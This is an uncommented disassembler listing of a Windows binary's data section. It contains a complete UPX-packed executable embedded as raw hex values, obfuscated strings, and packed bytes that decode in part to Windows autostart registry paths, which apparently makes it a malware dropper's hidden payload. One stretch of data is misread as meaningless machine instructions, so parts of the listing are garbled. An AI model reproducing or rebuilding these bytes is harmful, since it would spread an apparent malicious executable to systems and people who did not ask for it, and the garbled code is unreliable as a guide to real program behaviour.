a747P db '<747~P',0 ; DATA XREF: sub_406E3F+D1A�o
aUmxi db '-Umxi',0 ; DATA XREF: sub_406E3F+D62�o
a@mc@_6u db '@mC@_6u',0 ; DATA XREF: sub_406E3F+E77�o
a61 db '61',0 ; DATA XREF: sub_406E3F+E9E�o
aXfr db ' xfR',0 ; DATA XREF: sub_406E3F+FA8�o
aUkggv db 'UkƒƒV',0 ; DATA XREF: sub_406E3F+1030�o
aGG db '<ƒ^>ƒ',0 ; DATA XREF: sub_406E3F+1107�o
off_44141E dd offset dword_442560 ; DATA XREF: sub_407F91+67�r
word_441422 dw 0FFFFh ; DATA XREF: sub_407F91+5�o
dd 8015FFFFh, 80200040h
db 40h, 0
word_44142E dw 5Fh ; DATA XREF: sub_408043+33�r
byte_441430 db 6Ch, 2Dh, 0 ; DATA XREF: sub_408043+46�o
byte_441433 db 0 ; DATA XREF: .text:004080A5�o
dd 6
dword_441438 dd 0Ch dword_44143C dd 0 ; sub_40811F:loc_408155�r ...
byte_441440 db 62h, 39h, 0 ; DATA XREF: sub_4081B0+1A0�o
dword_441443 dd 74697Ch aIz db '<iZ!',0 ; DATA XREF: sub_4081B0+241�o
aMzr db 'MZ',0 ; DATA XREF: sub_4085C0+88�o
dd 3, 4, 0FFFFh, 0B8h, 0
dd 40h, 8 dup(0)
dd 0C8h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 13h dup(0)
dd 4550h, 3014Ch, 41CA88F2h, 2 dup(0)
dd 10F00E0h, 6010Bh, 4000h, 1000h, 5000h, 9820h, 6000h
dd 0A000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 0B000h, 1000h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 0A000h, 0D8h, 1Ch dup(0)
aUpx0 db 'UPX0',0
align 4
dd 5000h, 1000h, 0
dd 400h, 3 dup(0)
dd 0E0000080h, 31585055h, 0
dd 4000h, 6000h, 3A00h, 400h, 3 dup(0)
dd 0E0000040h, 32585055h, 0
dd 1000h, 0A000h, 200h, 3E00h, 3 dup(0)
dd 0C0000040h, 42h dup(0)
dd 0A0000h
aInfoThisFileIs db '$Info: This file is packed with the UPX executable packer http://'
db 'upx.tsx.org $',0Ah,0
aIdUpx1_07Copyr db '$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Re'
db 'served. $',0Ah,0
dd 21585055h, 902090Ch, 0A2620A53h, 5F94A837h, 7269h, 381Fh
dd 7000h, 38000426h, 92087EE9h, 905A4D00h, 43B0300h, 0B2C83200h
dd 40B8FFFFh, 377FF97Fh, 1F0E04C8h, 0B4000EBAh, 0B821CD09h
dd 68544C01h, 70207369h, 0FFFFFDBFh, 72676F72h, 63206D61h
dd 6F6E6E61h, 65622074h, 6E757220h, 44026920h, 6D20534Fh
dd 0FF6050EDh, 2E65646Fh, 240A0D0Dh, 134550C7h, 0FF21DBEDh
dd 2014Ch, 41CA888Ah, 0B219DE0h, 0F080601h, 22B37EE9h
dd 18A400E0h, 732510E0h, 6366F925h, 501E020Bh, 0E6760604h
dd 341E0C96h, 59200710h, 0A006F65Eh, 757829E0h, 6FDDB201h
dd 64D8017Ch, 3F764D38h, 742E3790h, 2B747865h, 6FFB20A2h
dd 0EB96CBh, 2EE0041Ah, 6F6C6572h, 0ECA6CC63h, 0FB9E677Bh
dd 42A22623h, 3D951079h, 30340370h, 669B2CDBh, 2FFA1226h
dd 1B3046E2h, 3BAE9A69h, 32C0B42h, 0D36E5E14h, 4AB2CD34h
dd 7062562Ch, 34D34D86h, 0C2AE9C4Dh, 9AF2E2D4h, 83659AEh
dd 728182Dh, 9A69463Ch, 625469A6h, 0B28E786Ch, 9EA69A69h
dd 2E2C6B4h, 0B9D34D2Fh, 2E0AF4CDh, 3C240397h, 0D34D344Ch
dd 7C6A5C34h, 34DB9A8Ah, 0C0AAD34Dh, 2EF2E6CEh, 0A77659BFh
dd 1087243Bh, 0E42BF403h, 0A69A69A6h, 0B6C0CAD4h, 6D60BAACh
dd 9098A29Ah, 0B27FD72Bh, 0E9B67B66h, 2F8A9603h, 3307813h
dd 17FFFF88h, 813066D2h, 54464F53h, 45524157h, 63694D5Ch
dd 6F736F72h, 0FFFFE566h, 575C74FFh, 6F646E69h, 435C7377h
dd 65727275h, 6556746Eh, 6F697372h, 68535C6Eh, 0DB6FFB7Fh
dd 760C536Ch, 624F6528h, 7463656Ah, 79611044h, 64616F4Ch
dd 7015AD6Eh, 82B3947h, 3F4D6739h, 2006A5FFh, 7041DB6Ch
dd 6D747261h, 495C6E65h, 5EDFFA6Eh, 3B635303h, 323302h
dd 49534C43h, 0D9235C44h, 0BBE77Eh, 3830257Bh, 34042D58h
dd 61DBFA5Dh, 83237D03h, 9090FCECh, 5706F0E8h, 0AFBBDEF7h
dd 3759060Bh, 74697845h, 0DE827C73h, 4CFB6046h, 71726269h
dd 686B3B79h, 0D76C656Eh, 0DF67BF6Eh, 1B545FB5h, 0FD55779h
dd 0DBFB7DF6h, 7562B565h, 69725067h, 67656CC7h, 305C2365h
dd 1ED77850h, 0F2B642Eh, 4F4C5058h, 0B7376F11h, 727033D5h
dd 61C52172h, 73642B62h, 0DEC6F66h, 126F6236h, 0BB79732Eh
dd 0A0DD035Ch, 4964B835h, 3A5D5C21h, 0B7F6472h, 511A8FB1h
dd 1F335F74h, 4F5F5CECh, 0B2186570h, 566EFE57h, 61484478h
dd 6E706Eh, 37FFB5ACh, 542D2D4Dh, 51574B59h, 4A484647h
dd 61130E0Ah, 411FF9EDh, 41594245h, 464C4853h, 67025B25h
dd 20EF7B09h, 12050320h, 7BEE3023h, 0F32B0EFh, 15040B3Ah
dd 83601E33h, 57677FFCh, 4B574A45h, 45574A46h, 13BBAB41h
dd 444EFE9Ah, 44525349h, 0FF971A03h, 901FA200h, 0B6ECBCBh
dd 8D0F1FA6h, 0B9219121h, 2319A4BCh, 35253123h, 7FD36D25h
db 0D9h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 57740150h
push 24h
dec ch
imul ch
adc eax, 8D1E112Ch
inc ebp
lock push eax
or [eax], ebp
movzx eax, word ptr [ebp-6]
push eax
mov esi, ds:74F3CF20h
iret
; ---------------------------------------------------------------------------
db 0Ah
dd 0FE0450FCh, 66F4F6F8h, 50F7FB9Bh, 5B78858Dh, 0C068F075h
dd 10D63826h, 0ECBB36CDh, 68FEB017h, 0C4F14B4h, 7F1DB76Ah
dd 599904FBh, 0DC5FF9F7h, 5205C283h, 0D60C2A50h, 0CC10345Dh
dd 832F73BDh, 271538C4h, 29B06850h, 76DB3B81h, 0BF8F5B77h
dd 575080A0h, 220F1228h, 736E5214h, 15A40647h, 8763730h
dd 0E6B07D33h, 310B1766h, 68096A2Ch, 0E761D898h, 8830C9ECh
dd 0DB9F2845h, 372F66FDh, 40687909h, 6E026823h, 986E7786h
dd 5F12606Ch, 22C3C95Eh, 1BEF0AEFh, 8B5318E1h, 6726A91Dh
dd 7D89FF33h, 0FF0AEFFCh, 83D3FFFCh, 895010C0h, 0DC1C312Ch
dd 3B59F08Bh, 23840FF7h, 37BAEFDBh, 680A6A49h, 17563AE4h
dd 56A021Dh, 0F00F468Dh, 7B16DFB7h, 18590F81h, 7640D3B4h
dd 0ED6C0F46h, 1509730Fh, 2068570Ch, 14752412h, 0DED93FFBh
dd 0E75C73Bh, 6A041809h, 8D23EB02h, 0F351F84Dh, 0B3DB1337h
dd 2BF8111Ch, 50215E2Ah, 6EEDC210h, 0FA08823Bh, 13E95803h
dd 0FB62840Ah, 68F7DD77h, 57833000h, 8B1F4C2Eh, 74DF3BD8h
dd 5C14687Dh, 1BB73AD9h, 4681048h, 0EF4B70Ah, 0BB6F6044h
dd 8BF66ABFh, 0F86858F8h, 5AC32B58h, 16F803F4h, 0F4BFC28Dh
dd 0C87E89F1h, 0C103CB2Bh, 210B4689h, 0B86E7E22h, 5356E10Dh
dd 104023B0h, 0EEF633E8h, 0C2DFEC6Fh, 50560F43h, 16565653h
dd 74C68C3Ch, 17EE7709h, 0EB389B8Dh, 431C710h, 350807EBh
dd 699ECDFh, 7111A25h, 611B7D8Bh, 5B6006A1h, 57465161h
dd 8E310F60h, 96BB66DFh, 542461FCh, 0A31CAF0Fh, 0FFDE0EB4h
dd 0A12175FFh, 7621B907h, 0C0693524h, 7F7C7BFBh, 6851C82Bh
dd 98EDC212h, 1D582BD9h, 74BFD0F7h, 0F6FB2D24h, 0C701C7DCh
dd 0A756155Ch, 0C033500Ch, 0DD3306BCh, 9A6B0CA1h, 6C5DA160h
dd 0D9131A3Bh, 206AD956h, 0B438641Ah, 0DE089D8Dh, 16ECA2F0h
dd 0D866B738h, 522E3019h, 6B02F8C3h, 0C7DBDA1Bh, 13010E10h
dd 0D537106Ah, 0AD99E9B3h, 0C61014FCh, 0A702284Bh, 780DCD73h
dd 4104FDD8h, 9D237C51h, 15117A79h, 0E07813E0h, 1F9259B5h
dd 111244CFh, 72E9DB54h, 8B740ED3h, 2F7483F0h, 0D9E80390h
dd 78325B64h, 1270A056h, 21199D35h, 681B6C57h, 0EF8D1F5Eh
dd 537D8986h, 5357DB33h, 0EE906440h, 0E70B6FBDh, 6C745B83h
dd 0A218BE56h, 6667BF6Ah, 87F538Ch, 15B5890Fh, 0D3EC5750h
dd 858A3FD2h, 9F3674C0h, 39D66784h, 6CE6E199h, 26137476h
dd 0EB158420h, 9BE171E3h, 0FC145B35h, 57D9895Bh, 0B067FC61h
dd 0C38B5E3Fh, 48D5B5Fh, 56085D8Bh, 0B7FE5357h, 590EFDBEh
dd 0C88B3D66h, 0D1443F76h, 5C1A3C80h, 0C1810D74h, 0AF6FFF6Dh
dd 77C9151Fh, 4101EBECh, 73C83B66h, 0FFC91B23h, 2B4BE17h
dd 0F12B6DF0h, 8DC51778h, 8A470814h, 94881A14h, 63766105h
dd 0C7186D7Bh, 7AEB7E6Dh, 18B7C62Fh, 644C90A6h, 560C245Ch
dd 0DDB7AF9Dh, 7C8B57FFh, 0DB851024h, 0A6E197Eh, 6AC02EABh
dd 0E6787D1Ah, 0C280FFFEh, 3E148861h, 7CF33B46h, 1F2480E7h
dd 109F3200h, 0F8EC2C02h, 8B0C8FFFh, 5648084Dh, 50BC0D89h
dd 0F0C67775h, 930B237Bh, 0F898A151h, 4F84536Fh, 0DA0BB0B6h
dd 0C711FC1Bh, 0C75C2404h, 76F67B01h, 59D759D6h, 68152E75h
dd 0CBF01354h, 4E1AB37Eh, 0B27093Bh, 0CEB0408h, 0BDAFE161h
dd 193C68F1h, 59E0A929h, 0C3585059h, 702795F7h, 189B0CC2h
dd 72891703h, 0FB3DB363h, 12946801h, 8F59D126h, 95B73DA8h
dd 934F85BDh, 940E01FEh, 0C9ADBF5Dh, 5D9C64C9h, 0F8F07B57h
dd 6D937C9Dh, 80A530BBh, 0B1E19F68h, 59CDB44Eh, 3F00C0A3h
dd 5F7BACA4h, 3C7C315Fh, 70241235h, 0B36E960Ch, 0BFA04505h
dd 6657E564h, 55A05A78h, 26136DB7h, 0B93D9B9Ch, 0EBEB05FDh
dd 0CFCE8E6h, 580A3468h, 77166CC7h, 756A7B16h, 0E15D2733h
dd 0F7E35F17h, 0D8CDE804h, 8B76E69Fh, 0FC18A2F1h, 5006C79Ch
dd 8C654113h, 1A1DE399h, 14C0196Ah, 8D66B605h, 0B7102610h
dd 6E741F20h, 126D5781h, 0B0C30257h, 1EB56F09h, 18C8D761h
dd 59350B75h, 89FF2DC0h, 1CEB147Eh, 9575757h, 99BEAC47h
dd 14463EB7h, 20469974h, 8B1C1601h, 7F685FC6h, 568DC6D7h
dd 420F6283h, 82444F6h, 66D82001h, 20D611DBh, 1B5E1D59h
dd 0BB6F3DA2h, 8BEAFB59h, 74689D5Ch, 8BD77403h, 95A3DB76h
dd 0F68514EDh, 61465609h, 0FB7F752Ah, 0DF1CB7F6h, 375F03Bh
dd 515B718Dh, 27FA8318h, 20453925h, 35B20675h, 0C183FDB0h
dd 3EB5104h, 184720D0h, 0B3F51402h, 0AF10D674h, 5DB44552h
dd 5EB61CC2h, 0B870D805h, 0E41A7AC4h, 42BEE510h, 681804FFh
dd 9A7A20C4h, 0C847896Ah, 0E4CED8h, 0CC18086Ah, 2BD8D8C8h
dd 1016C420h, 11D94C35h, 18D4D032h, 1A05B08Dh, 69140B2Ch
dd 1D19D81Bh, 45148E7Ch, 530800A0h, 170A565Eh, 605E12CCh
dd 0B8FC4D61h, 0C604660Bh, 0C040940Ah, 0C0B383ABh, 70BDDDEDh
dd 5750211h, 3CEBEA8Bh, 0CD0612CBh, 0AFBCC187h, 53A46810h
dd 76FC1A8Ah, 0EB760362h, 0C7D3931h, 5D2BA5Dh, 17D0191Eh
dd 1EE002EBh, 0DD6B5BB8h, 575F30F6h, 0AE718D00h, 0C57EDC91h
dd 2189344Ah, 8C20E94h, 0F1386DAEh, 880BF98h, 98E7857h
dd 8BEF12DBh, 0C331085Eh, 0FDF402F0h, 205C74C3h, 2C147449h
dd 9BA1C7C8h, 660DA265h, 0DD4A7AC4h, 46E25C68h, 0EFE84D6Dh
dd 0BA4F510Ch, 0F13563FFh, 0D8F7FC26h, 2456C01Bh, 71E405FCh
dd 0D4839B50h, 18A86FC5h, 0C503E595h, 91B7B36Ah, 0C445FFB1h
dd 940F753Bh, 8FB693C0h, 0F9D91F06h, 0CC264A3Eh, 0DE35B18Bh
dd 59104D17h, 91060689h, 0F977CFA6h, 883B986h, 0E048A04h
dd 0C460101h, 78FB5D27h, 18E7106Dh, 44C77AD5h, 8D9D5342h
dd 0D9437639h, 5945F66Ah, 62065746h, 0CB3EB243h, 0F6AA3D06h
dd 0B46C2B6Dh, 0CC9B54Ch, 5F018963h, 62144B56h, 4C5B5DDCh
dd 0A420418Bh, 0DED6B455h, 56E1314Ch, 0A4CF3F68h, 16475D00h
dd 14158866h, 0EB670574h, 8CDC336Ch, 0A9AAA627h, 6332001Dh
dd 68039C1Bh, 0B8040F5Eh, 20612F6Dh, 0B60F6660h, 8AFB0573h
dd 785EBB64h, 0C10B9897h, 58681261h, 28D05213h, 2E21FBC2h
dd 6408A164h, 0A3072589h, 0DDC6C7CEh, 6589D22Ch, 0C29A5E8h
dd 57F42724h, 0BBB07BD7h, 50C3030Bh, 0CC0AF868h, 0E4B40B76h
dd 0F404014h, 0D170E12Eh, 61E0B916h, 2B34AF38h, 0F192A952h
dd 90B36BFBh, 1AFA9B69h, 0D9B94DCh, 0A1538593h, 94934390h
dd 0B6EB5B4Fh, 2FE416F8h, 0DB084239h, 0C0BF45F7h, 3BC8DA2Dh
dd 7C807C5Bh, 573201Eh, 5A6D44C6h, 2E066FE2h, 0FFE9EB40h
dd 75461F76h, 1BC3E075h, 81AE086Eh, 6480E003h, 0BAB1B961h
dd 50CC3105h, 0A60C04D4h, 0A246A6DDh, 1E081D5Fh, 0D80450DAh
dd 3CF3CF3Ch, 0CECCD4D6h, 79E79ED2h, 0B60A46D9h, 5060746h
dd 0EF9E6A04h, 30818F9h, 6010204h, 602353B6h, 92156A71h
dd 3405885h, 5790E813h, 3EC498C9h, 8598BF72h, 2350C49Ah
dd 683F50AEh, 0ADC6B6Fh, 420821D0h, 37865950h, 0D911623Eh
dd 0EBFFC483h, 1696D20Eh, 8BC3C2BEh, 598B0C75h, 0D907F185h
dd 0BEFA37D3h, 7D83CF1Ch, 0E07000E0h, 1A46160Eh, 72CC9684h
dd 0F20DB4F0h, 0CE718A70h, 0F468D8FBh, 3811C9F0h, 0ABFFC883h
dd 7C2CCDF6h, 55C09FA1h, 92D63B0Ch, 9EA50D79h, 77FCB42Eh
dd 86E41DE6h, 0FFFF7AF2h, 135EBB4Bh, 0DCA6CE8Bh, 2973CA3Bh
dd 8839048Ah, 303CC045h
dd 393C0972h, 8F4D1D73h, 0C0F87D77h, 4B0A0D6Ah, 797F74B8h
dd 0D8F18BE4h, 0EB4106EBh, 0F390FD0h, 0EDBC2885h, 4A8DBD1Fh
dd 48F13BF6h, 0FD735C15h, 88D1DFFFh, 144E8D00h, 2A7DC13Bh
dd 2673C23Bh, 88380C8Ah, 0F980BC4Dh, 0B6B19A2Dh, 54040A53h
dd 0DB77C959h, 75DB37DBh, 4092530h, 0D46583h, 0D44D3910h
dd 0D966AFA0h, 8DBF76DEh, 75C23B56h, 0B8388A1Fh, 9A78D8E8h
dd 1905080Ch, 36C143A4h, 0F8D6D8CCh, 802ED4ADh, 0D0F65181h
dd 2113C62h, 0CD08D0Bh, 0FD87777h, 3E048D02h, 0E021B50h
dd 0F023E44h, 498C639Eh, 80D346D0h, 0AD85C11h, 0B1208D0h
dd 4C883C4h, 4AEE37B7h, 7F3205C2h, 7C01C40Ah, 7E0C0405h
dd 6237895Dh, 43EA1A0h, 5066E31h, 0E6EC5AD4h, 6077530h
dd 2C187431h, 1B0B3003h, 0D70997ADh, 10D86846h, 18BB6D4Ah
dd 0E00A9214h, 0B84EA76h, 0C58830A1h, 9098C3C3h, 5878E423h
dd 19679CDBh, 0D35DC569h, 0FDB05DB3h, 9EBF3C80h, 48B662Eh
dd 0F2A02F4Fh, 35B97E10h, 97F0D7Ch, 0C475E33Ah, 0C972C33Bh
dd 5BCB5321h, 35BB6150h, 572A2E53h, 9C62470Ch, 0BF087EC5h
dd 590E7CB2h, 3BC975EBh, 0D33275CBh, 974C2CB0h, 0EFC65D5Dh
dd 0BF74B34Dh, 9124753Dh, 0C109847h, 3043B164h, 33949DCBh
dd 0C3E9C26Fh, 5306CBBBh, 900BBE4Ch, 0CC841966h, 0C47704CAh
dd 65C25FF2h, 0DA047704h, 5330C483h, 4C0A6A53h, 0ACD6DF07h
dd 5325FF0Ch, 497A20ABh, 0B815CE46h, 0D9AF27CCh, 0E4AAD91Bh
dd 0D90C1EA8h, 8D919037h, 0A8A800A4h, 0A36FF3A3h, 7C8366F1h
dd 7100085h, 875300Ah, 0EC3C304Bh, 75BE310Ch, 47FF9E0Fh
dd 16C811C8h, 0AE608852h, 0FA260394h, 4B466EB7h, 0ECEB5CFDh
dd 3DC86212h
dword_442560 dd 7D6857C3h, 7E80C58Bh, 423A0617h, 866DCE6Dh, 1CA5196Dh
; DATA XREF: .data:off_44141E�o
dd 1E05F51Ah, 0D26329C1h, 0C22936Ch, 0ABE824D0h, 5EFE0D6Fh
dd 3F32B36h, 0D1B89B30h, 0C11656EEh, 16F06DAFh, 0DFFC60Eh
dd 0B54A140Ah, 2A2AB472h, 37096F20h, 22A850B3h, 0BF09037h
dd 0BF6E1174h, 0F3928D1h, 0D1C22B99h, 27E0EF8h, 0EB6356B1h
dd 0D33F923h, 7615AB2Ch, 0F6FD1CBh, 818DF9D1h, 7E275F70h
dd 7FB76605h, 0EBACE9A1h, 79FEAC16h, 0B87D3B02h, 0B8F84173h
dd 42F62D2Bh, 0AD90EC13h, 67501F04h, 0C4B62D72h, 15F703DBh
dd 0D8E8D190h, 0DB1955C7h, 43A3F336h, 0B0E1655h, 647D6F47h
dd 7FFF1EDFh, 7CF73BF0h, 17E8D06h, 814FBAEBh, 0A6E2A4C7h
dd 473FE3Bh, 0D5B6FC1Eh, 4EACF78Bh, 2B00FC5Fh, 7622AC75h
dd 0A30C90A1h, 7890024h, 5CD9A604h, 4789A4FBh, 7F9F504h
dd 12B4C808h, 0A9CB5285h, 21C098A7h, 322B1A37h, 0B1101047h
dd 8E95BA10h, 0A1A5C744h, 0AA32D527h, 401D4582h, 9436186Eh
dd 97573C60h, 2BB54868h, 0A05B7619h, 980E15B8h, 8E0C9E9Ch
dd 9193E951h, 0CE35C73Eh, 2A2EE05Dh, 0B741E14h, 6A6E4611h
dd 850B5BF8h, 8B5A9A04h, 2084B88Ch, 77B9CA53h, 0D7715B1Fh
dd 5589DC24h, 3C8D1AE8h, 7E1704BDh, 43C969ADh, 8DA0072Bh
dd 1B10A402h, 8501D49Fh, 300F560h, 8605FEBBh, 6857E035h
dd 1345F9B8h, 0CC308573h, 4816B80Eh, 0DB59893Eh, 3913EC18h
dd 0AFA26285h, 1A3A441h, 6BE0ACEAh, 6F7F7269h, 734FF64h
dd 40BB4E5Dh, 82A012C5h, 4A95CD9Bh, 10689731h, 84EC5027h
dd 98C439CEh, 11830CDEh, 8BA5EE72h, 12FE7A3Dh, 0A8DBA0B9h
dd 7CC052C5h, 7B1BAC01h, 7517DBFBh, 0EBE51839h, 8DE00B37h
dd 6C51D01Ch, 19B0F65Ch, 1BE1103h, 0FD7B0F20h, 282BB1DBh
dd 0BD6F1B06h, 0CC38151Ah, 0A3C4B5FFh, 4DCD99F9h, 1863CCD0h
dd 0DDBB8C0Eh, 711E0B0Dh, 30CB84EBh, 0D868D31Bh, 0B9EC9D90h
dd 996975B8h, 10984B4Fh, 53061326h, 244F8053h, 0EB4E404Ch
dd 0B7646A91h, 5F471304h, 439C87EBh, 6C2008C6h, 0E88C0DB8h
dd 63C7ABBAh, 5D346A42h, 0C11D72Fh, 0F460C6C7h, 7DAF6359h
dd 460B2C8h, 23F0B850h, 11EC0912h, 61548C19h, 0C80BEEC8h
dd 51C78359h, 7CC84D83h, 0EBF160C0h, 1C285778h, 8EC6045Fh
dd 1B6B5AF0h, 0E8BAC0Bh, 0DAB74C33h, 76D09899h, 0C8B52139h
dd 0B83351A6h, 3E8924CFh, 0FCBBA289h, 0B8844420h, 6425527Dh
dd 97D684AFh, 0C683477Eh, 72F0C208h, 0A75ECFh, 0D81DCC04h
dd 0C4C75F78h, 5328D574h, 0CBFAE07h, 474CD135h, 9F11280Fh
dd 67E8666Ah, 2C11138Bh, 480825FFh, 0C8E79105h, 0F80004C8h
dd 0C16CF410h, 0ECF0919Ah, 0E81900CCh, 8C8CEC27h, 5100DCE0h
dd 1BF6F33Dh, 0F58D767Dh, 81147208h, 662D87E9h, 7F6F162Dh
dd 170185ECh, 0C82BEC73h, 8B0CC48Bh, 0C8F18BE1h, 40C1B748h
dd 804FC331h, 869F8C88h, 0E9998CC8h, 602960B8h, 77C9C96Fh
dd 0C8133A1Dh, 284A0088h, 520F4F7h, 80E11993h, 0CC397E16h
dd 34F7D03Dh, 85A8271Bh, 48206F50h, 972EDF1Bh, 132B0D97h
dd 10DC2C32h, 35802A74h, 2F7C4BCBh, 3A276C1Ch, 0D6E5CB20h
dd 5811142Fh, 5CDA3058h, 805FAC76h, 2898132Bh, 2089E811h
dd 2A6578Ch, 0BFE59F72h, 9709E6B5h, 6D656D02h, 99797063h
dd 0B3B96573h, 0BE7497FCh, 72747302h, 0C56E656Ch, 0DD3BC302h
dd 63096BCFh, 31BA1D61h, 0B76CD3A6h, 333F3F7Fh, 58415940h
dd 5A400250h, 0FD320F0Fh, 0E3AF837h, 0AACA0F49h, 65637865h
dd 685F7470h, 43D16EDDh, 3DC17252h, 696F4302h, 0B2FDADB3h
dd 435F491Bh, 85467878h, 781D4875h, 0AF0ADEA3h, 5F484513h
dd 676F6C82h, 0B41BD42h, 5243D031h, 7D9C7B54h, 49573DB6h
dd 0C45014Eh, 8A6C038Fh, 0DEE0B641h, 0AA0B7933h, 3743240Bh
dd 0B54276A8h, 0D60BDBFh, 0DEDB5460h, 52657474h, 81056FD3h
dd 0FDB6B7BAh, 7257037Fh, 62500E69h, 4D737396h, 0FB9B721Bh
dd 89C7EED7h, 13F64701h, 72646441h, 2E671117h, 213AA5D8h
dd 5F4F6C75h, 0FFDAD809h, 69560356h, 61757472h, 2A84416Ch
dd 0C10A8445h, 261751Ch, 0B5354C31h, 33FFEA9Bh, 6B636954h
dd 4E756F43h, 6490207h, 0AEED86B6h, 656B2BD5h, 3632E64h
dd 0EB579767h, 4D41C04Ah, 65555075h, 4DEA930Fh, 452FA136h
dd 0FDFEDAD1h, 3885961h, 0DB636C5Fh, 5302F500h, 0BC80461Dh
dd 6710A56Dh, 14F0D6Dh, 70E09E47h, 6F258BDDh, 70210B8Fh
dd 0F6B6D579h, 5323A66Bh, 44EB0F79h, 0E6EC1EBEh, 16F10C5Ah
dd 335B0273h, 2BB64E32h, 30D7026Bh, 718C4975h, 0CB68E6C8h
dd 0AD066525h, 0AA96DF68h, 0B0A36F70h, 6E531870h, 6B617061h
dd 6F2846DDh, 7F43D51Bh, 784B1E62h, 414482DBh, 45DB6D65h
dd 7C33BB46h, 15EA4EA5h, 0B530329h, 16D83714h, 2FDA00ECh
dd 0D2306E1Ah, 0CD86F92Fh, 0C3ACD5AAh, 0DAD6C85Ah, 45614CF2h
dd 468511A0h, 3B9D66F7h, 1FAE7645h, 60640F4Ah, 7AAEC2B4h
dd 6544007Fh, 886F49FBh, 0D6D5671Eh, 0E5004C76h, 79651F31h
dd 61378000h, 87022ED5h, 8D965DC8h, 453C1386h, 61236592h
dd 1600446h, 255368D8h, 0CF75426Ch, 0A900F8D4h, 721C4902h
dd 735B2DEBh, 7043AD6Ch, 694C430Ah, 0C9BD53C2h, 3D217386h
dd 0C288765Fh, 0D5284B08h, 0BBF19F79h, 1C68F436h, 7D18FF50h
dd 2EDB4500h, 4508F653h, 5C646969h, 0B76A9F68h, 2767428Dh
dd 7942146Ch, 0CE6ECA26h, 284F55D1h, 787A6927h, 63090330h
dd 0F459B55h, 0DFE96AB0h, 454B00F8h, 0C74C3C52h, 70A95D0Bh
dd 635D02D8h, 7B716682h, 258CC218h, 71D6FC80h, 1789E9C3h
dd 72676506h, 0ED2564D0h, 7C3B36h, 0CAF00E3h, 5A53553Fh
dd 61E176B6h, 0F9001C57h, 0B3EE756Ah, 9DB06Bh, 73B7149Ch
dd 36C3017Dh, 126FADC9h, 96567075h, 621EA775h, 1A86901h
dd 528B343Dh, 0D48E16F0h, 654BC620h, 440DF8A9h, 34CC4336h
dd 0CC1F9A30h, 3BDFD6D8h, 411220ECh, 496F5644h, 79424B83h
dd 6F432561h, 6C112755h, 0F666785h, 54754730h, 6B0D390Fh
dd 1F49D603h, 0AE3C916Fh, 845160h, 0DFD6FFCEh, 5C333F50h
dd 6C336033h, 337C3A33h, 338C3380h, 6FFFF90h, 33AF33FFh
dd 33C433B9h, 9341BEBh, 31342234h, 5A345334h, 84347934h
dd 0FFFFFF34h, 0BB34A8FFh, 0F634CC34h, 2B350634h, 3B353135h
dd 5D354E35h, 88357D35h, 93358E35h, 0A7359D35h, 0FFFFFF35h
dd 0D335B4FFh, 0F535EA35h, 35361035h, 48364036h, 61365B36h
dd 77366636h, 97369036h, 0B236AB36h, 0FFFFFF36h, 0D136C2FFh
dd 436E636h, 23371837h, 39372A37h, 68375337h, 0C2376F37h
dd 0F937F237h, 0B7386937h, 0FFFF5638h, 0DE38CCFFh, 0FF38EB38h
dd 50392938h, 80395C39h, 9A399439h, 0B839A539h, 0FFFFA539h
dd 39C5FFFFh, 39D239CBh, 39E039D8h, 39F839E5h, 3A483A0Dh
dd 3A843A4Fh, 3AA53A92h, 3AED3AE4h, 6FFFFF3Fh, 3C123BF1h
dd 383C0E27h, 5E3C3F3Ch, 0B13CA33Ch, 0F23CBE3Ch, 0C73D043Ch
dd 0FFFFFF3Dh, 0F53DE5FFh, 183E133Dh, 3A3E343Eh, 7F3E793Eh
dd 0E93E983Eh, 573F503Eh, 6B3F643Fh, 863F7B3Fh, 0C34A3F3Fh
dd 0CB3F98FFh, 0EC3FD13Fh, 0F3FF13Fh, 302A7320h, 0FFFFFFFEh
dd 31B531B0h, 3320330Ah, 3337332Ah, 33B533B0h, 35663553h
dd 362C3615h, 364A3633h, 0FFDC3657h, 0C3EFFFFFh, 375836ECh
dd 37C837B4h, 37FA37F4h
dd 38403836h, 38593847h, 38993887h, 38A638A0h, 0FFFBBFFFh
dd 38B238ACh, 38BE38B8h, 38D238C4h, 3922D1D8h, 392E3928h
dd 3951393Dh, 39843968h, 0E3584004h, 0F0AC3990h, 12819200h
dd 0F7D0FF8Ah, 75ABFF65h, 3149D00Fh, 31ABE6Eh, 7151ABFh
dd 7CDF37DDh, 1AAD4D68h, 0B44D3736h, 68F63F1Ah, 27301AB8h
dd 14644F52h, 686369E7h, 0F7000507h, 0E4B9B535h, 140727Ch
dd 79F3140h, 9ABE02EBh, 31A09713h, 0C80B0D2Ch, 0F601E9D8h
dd 19270403h, 0A0F27BC5h, 25FECA3Bh, 8A31DB07h, 3A307C53h
dd 689F3460h, 92BDCEC2h, 2338E004h, 0A703304Fh, 0C840BC28h
dd 76A9831Ch, 7A32A76h, 602B2954h, 8C2DA207h, 3B920762h
dd 525E642Bh, 0E7617461h, 530780FBh, 7314643h, 65B2D8C8h
dd 0AF5458DDh, 72C2307h, 0A8DB34Fh, 9F2EE21Dh, 23EB00D1h
dd 0F37D98A3h, 3B570780h, 7F1460E1h, 0C00302B2h, 4651ED07h
dd 32E27F31h, 36CEEB03h, 18330ACBh, 0C01332F6h, 0A603AA0Bh
dd 94A69A69h, 384A60DEh, 9AEBB2C8h, 267F10FAh, 44337A8Bh
dd 375D34D3h, 3B23BC6h, 656A7E96h, 5E4D34D3h, 0FE162E3Eh
dd 69A69A31h, 0B8D0E69Ah, 0E3748CA6h, 5C6D9630h, 25B9331h
dd 414DF27h, 51264AA4h, 0FFC98353h, 54BF722Eh, 5051C1F9h
dd 5F2020BBh, 821FEAB7h, 2856C5FCh, 0C5FC7D8Bh, 97D488B9h
dd 332E7782h, 5DABF3C0h, 328358Bh, 6E89B73Dh, 45E488A0h
dd 1405E888h, 0EE936C8Ch, 1DE40E08h, 21C8D8D4h, 0D4D88723h
dd 763278DCh, 0EE0E0C8h, 0E4EC05DCh, 0E123EF92h, 0F4FC0AD6h
